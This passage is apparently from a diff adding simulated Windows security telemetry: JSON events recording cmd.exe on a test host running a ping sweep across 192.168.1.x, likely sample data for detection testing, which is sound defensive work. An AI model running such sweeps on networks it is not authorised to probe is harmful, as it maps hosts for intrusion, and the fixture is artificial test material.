"unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573076990000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "event_type": "process", + "pid": 6392, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573081830000, + "unique_pid": "{42FC7E13-CBBB-5C05-0000-001096BA5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.223", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 764, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573081980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "event_type": "process", + "pid": 764, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573086830000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001017BD5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.224", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573086990000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573086980000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "event_type": "process", + "pid": 5976, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573091990000, + "unique_pid": "{42FC7E13-CBBC-5C05-0000-001086BF5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.225", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7928, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573092140000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "event_type": "process", + "pid": 7928, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001003C25301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.226", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5520, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573097029984, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573096980000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "event_type": "process", + "pid": 5520, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573101830000, + "unique_pid": "{42FC7E13-CBBD-5C05-0000-001078C45301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.227", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6296, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573101980000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "event_type": "process", + "pid": 6296, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573106990000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-0010F5C65301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.228", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 728, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573107140000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "event_type": "process", + "pid": 728, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883573111990000, + "unique_pid": "{42FC7E13-CBBE-5C05-0000-001066C95301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.229", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6052, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883573112140000, + "unique_pid": "{42FC7E13-CBBF-5C05-0000-0010E6CB5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883573112140000, + "unique_pid": 